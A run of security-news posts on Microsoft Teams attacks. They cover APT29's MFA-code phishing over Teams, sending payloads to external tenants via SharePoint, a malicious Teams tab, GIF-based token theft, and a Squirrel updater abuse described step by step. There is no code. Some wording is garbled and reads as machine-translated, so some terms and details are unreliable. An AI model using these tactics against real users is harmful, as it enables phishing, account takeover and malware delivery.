Microsoft security experts said on Wednesday that a Russian state-sponsored hacking outfit named by Microsoft as “Midnight Blizzard,” but more generally known as APT29 or Cozy Bear, was responsible for the “highly targeted” social engineering attack.

APT29 hackers started attacking sites at the end of May, and they created new domains with a technical help theme by using accounts for Microsoft 365 that had been hijacked in earlier attacks. By using these domains, the cybercriminals sent messages via Microsoft Teams that were designed to trick users into giving acceptance for multifactor authentication prompts. The hackers’ ultimate goal was to get access to user accounts and steal critical information.

The actor utilizes Microsoft 365 tenants that belong to small companies that they have previously infiltrated in other attacks in order to host and launch their social engineering attack. This helps the actor carry out their attack more easily. The malicious actor first renames the compromised tenancy, then establishes a new onmicrosoft.com subdomain, and then installs a new user linked with that domain from which to deliver the outbound message to the target tenant. In order to provide the impression that the communications are legitimate, the bad actor creates a new subdomain and a new tenant name by using keywords with a product name or security-related topic. Their investigation is still continuing, and it includes looking at these precursory attacks that were aimed at compromising legal Azure tenants as well as the use of homoglyph domain names in social engineering lures. Microsoft has taken precautions to prevent the perpetrator from making use of the domains.

Chain of attacks using social engineering

Within the context of this activity, Midnight Blizzard has either obtained valid account credentials for the users they are targeting or they are targeting users who have passwordless authentication configured on their account. In either case, it is necessary for the user to enter a code that is displayed during the authentication flow into the prompt on the Microsoft Authenticator app that is installed on their mobile device.

When a user tries to log in to an account that requires this kind of MFA, they are shown a code that they must input into their authenticator app. This happens after the user has already attempted to authenticate themselves to the account. The user is presented with a popup on their device asking them to enter a code. After that, the actor will send a message to the user who is being targeted using Microsoft Teams, requesting that the user input the code into the prompt that is shown on their device.

The first step is for teams to request to speak.

It’s possible that an external user posing as a member of the security or technical support team will send a message request via Microsoft Teams to the user who is the target.

The second step is to request authentication from the app.

If the target user accepts the message request, they will then get a message from the attacker in Microsoft Teams. In this message, the attacker will try to persuade the user to input a code into the Microsoft Authenticator app that is installed on their mobile device.

Third Step is Authentication with the MFA Completed Successfully

The threat actor will be provided a token to authenticate as the targeted user if the targeted user accepts the message request and inputs the code into the Microsoft Authenticator app. Following successful completion of the authentication process, the actor is granted access to the user’s Microsoft 365 account.

After that, the actor will continue to perform post-compromise behavior, which will often entail the theft of information from the Microsoft 365 tenant that was hacked. It is probable that the actor is attempting to overcome conditional access controls that have been defined to limit access to certain resources to managed devices only by adding a device to the organization as a managed device through Microsoft Entra ID (previously Azure Active Directory). This occurs in some instances.

The post Phishing attack over Microsoft Teams allows getting MFA from victim appeared first on Information Security Newspaper | Hacking News.

Members of the Red Team at the security services business Jumpsec, did some digging and found a means to send malware via Microsoft Teams while using an account that was not affiliated with the target enterprise.

Users of one Microsoft tenancy are able to communicate with users of another Microsoft tenancy thanks to the fact that each of these organizations has its own Microsoft tenancy. When this is done, a banner reading “External” shows next to the name, as seen in the following example.

In contrast to when you are texting members of your own tenancy, you are unable to transmit files to staff members of other organizations while you are using messaging. See the difference in the following:

When the payload is sent in this manner, it is really housed on a Sharepoint domain, and the target gets it directly from that location. The recipient’s inbox, on the other hand, will see it as a file rather than a link to the file.

The fact that this circumvents practically all of the contemporary anti-phishing security mechanisms listed in the introduction to this warning makes it a potentially profitable channel for threat actors to deliver payloads. This advise warns that this should be avoided at all costs.

To begin, purchasing and registering a domain that is highly similarto your target organizations using M365 is a fairly basic process. It eliminates the need that you make use of mature domains, which require web servers, landing pages, CAPTCHAs, domain categorization, and URL filtering.

Second, it prevents the now-justifiably risky behavior of clicking on a link in an email, which is something that staff members have been instructed to avoid for years now. This drastically lowers the possibility that a regular staff member would recognize this as a phishing attack. The payload will now be supplied by a reliable Sharepoint domain, and it will arrive in the form of a file in the inbox that is associated with the target’s Teams account. As a result, the payload is not considered to be a malicious phishing website but rather one that inherits the trust reputation of Sharepoint.

Finally, when this vulnerability is paired with social engineering via Teams, it is quite simple to begin a chat, hop on a call, share screens, and do a variety of other things. When compared, it makes social engineering via email seem rather stale and stop-and-start rather than dynamic. When you put this strategy into action on an actual engagement, you can ask the target, under the guise of an IT specialist, whether they would be willing to join a call so that we could install some urgent software patches. Once on the call, this vulnerability could be used to send a payload, and when paired with a comprehensive social engineering attack, the victim unwittingly would grant the attacker implicit confidence.

Microsoft was notified of this vulnerability, and while the company confirmed that it is real, they said that it “did not meet the bar for immediate servicing.”

The post Microsoft Teams allows sending malware to hack someone via this vulnerability appeared first on Information Security Newspaper | Hacking News.

Although the attack requires multiple elements to materialize, the final exploitation is simple and its impact can be highly detrimental to users: “The flaw can be exploited to establish persistent read/write access to the affected user’s Microsoft infrastructure, including Teams chat, OneDrive and SharePoint,” the expert points out.

The attack can be carried out using a malicious Teams tab and abusing Power Automate flows. Grant presented his finding to Microsoft security teams and the flaw was corrected a short time later.

In his report, the expert described a hypothetical scenario in which an attacker (identified in the experiment as baduser@fakecorp.ca) could create a malicious Teams tab and use it to steal emails, messages, and files from Teams on behalf of a legitimate user. Unrestricted access to users’ inboxes represents a great opportunity for threat actors, actually constituting an enterprise email engagement (BEC) scenario.

As some users may remember, in a BEC attack the threat actors pose as members of the affected company to try to trick legitimate employees in order to divert money to accounts controlled by hackers. These attacks require hackers to collect a large amount of information about the companies targeted, including organizational chart, job names, work routines, financial statements, and security practices.

This attack starts with the creation of the malicious Teams tab. Grant performed this procedure by abusing a feature on the platform that allows users to launch small applications in any workgroup of which they are members.

Once this malicious tab is created, threat actors can pose as legitimate users and steal authentication tokens, in addition to deploying attacks typical of a BEC scenario. Microsoft has already updated the affected deployment, so the risk is expected to have been fully mitigated.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Vulnerability in Microsoft Teams could expose users’ sensitive information appeared first on Information Security Newspaper | Hacking News.

As the use of video conferencing platforms for home work increases, the battle between big tech companies continues to seek to seize a market that was badly exploited before the pandemic. This increase in the use of these resources has also revealed multiple security flaws, experts in a pentest training course.

One of the most recent security risks has to do with a malicious GIF that might have been stealing information from some Microsoft Teams accounts by exploiting a vulnerability to take full control of an organization’s networks. This problem was detected from the end of February, and is known to have remained active until a couple of weeks ago. The vulnerability was fixed on April 20, so no more similar attacks are expected.

According to the experts of the pentest training course, this vulnerability was present in all versions of Microsoft Teams for desktop and web browser. The problem lies in the way this software manages authentication tokens for image display.

Microsoft handles those tokens on its server located on teams.microsoft.com or any subdomain under that address. CyberArk researchers found that it was possible to hijack two of these subdomains (aadsync-test.teams.microsoft.com and data-dev.teams.microsoft.com) for malicious purposes.

Apparently, if a threat actor managed to get a target user to visit one of the compromised subdomains, the authentication tokens could be moved to a hacker-controlled server. Subsequently, threat actors could create a “token skype” to access Microsoft Team deployments.

Up to this point, this looks like a conventional phishing campaign. However, experts identified the use of a malicious GIF (an image of Donald Duck); by viewing this file, the compromised computers would be forced to give up the authentication token, thus giving up their data. According to the experts of the pentest training course, this is because the source of the GIF was a compromised subdomain and the teams will automatically communicate with them to view the image.

This attack variant could have been exploited to create a worm to deploy subsequent attacks. In the report, the researchers mentioned that the fact that the attackers only required the target user to view a GIF made it a very dangerous variant, in addition to an access point to other areas of the network.

According to the International Institute of Cyber Security (IICS), Microsoft corrected the vulnerability immediately, and the company is monitoring Microsoft Team deployments for any malicious activity related to this platform.

The post Hacking Microsoft teams by simply using a GIF image appeared first on Information Security Newspaper | Hacking News.

According to reports, the Microsoft Team vulnerability can be exploited by running an update command on the desktop version of the application. This issue also affects the desktop versions of WhatsApp and Github, however, it should be noted that the vulnerability can only be used to download a payload on the aforementioned sites.

All applications affected by this flaw employ an open source project called Squirrel, used to manage the installation and update of routines, while NuGet package manager controls the files, experts report on IT system audits.

The company has not yet corrected the reported vulnerability; on the other hand, Reegun Richard, expert in charge of reporting the flaw to Microsoft, proposed suspending the Team platform until the company resolved the incident; however, upon discovering that other specialists were working on this flaw, he began publishing his findings in order to help correct them.

The expert discovered that he could execute malicious code from Microsoft’s legitimate binary without increasing its privileges, and in case the application has control of the system files, the privileges could be easily scaled.

As for exploiting the flaw, any hacker can trick the Microsoft Teams update feature into downloading the malicious code using the company binary. The attacker must extract any nupkg package in which they can insert the shell code identified as “squirrek.exe”. When the hacker creates the appropriate package, they can go to the application folder and run the update.exe command; the application will be updated and downloaded the attacker’s shell code.

Experts in IT system audits from the International Institute of Cyber Security (IICS), Richard’s decision to disclose this vulnerability is related to Microsoft’s delay in releasing an update, so users remain Exposed.

The post Vulnerability in Microsoft Teams could allow hacker to gain complete control of your infrastructure appeared first on Information Security Newspaper | Hacking News.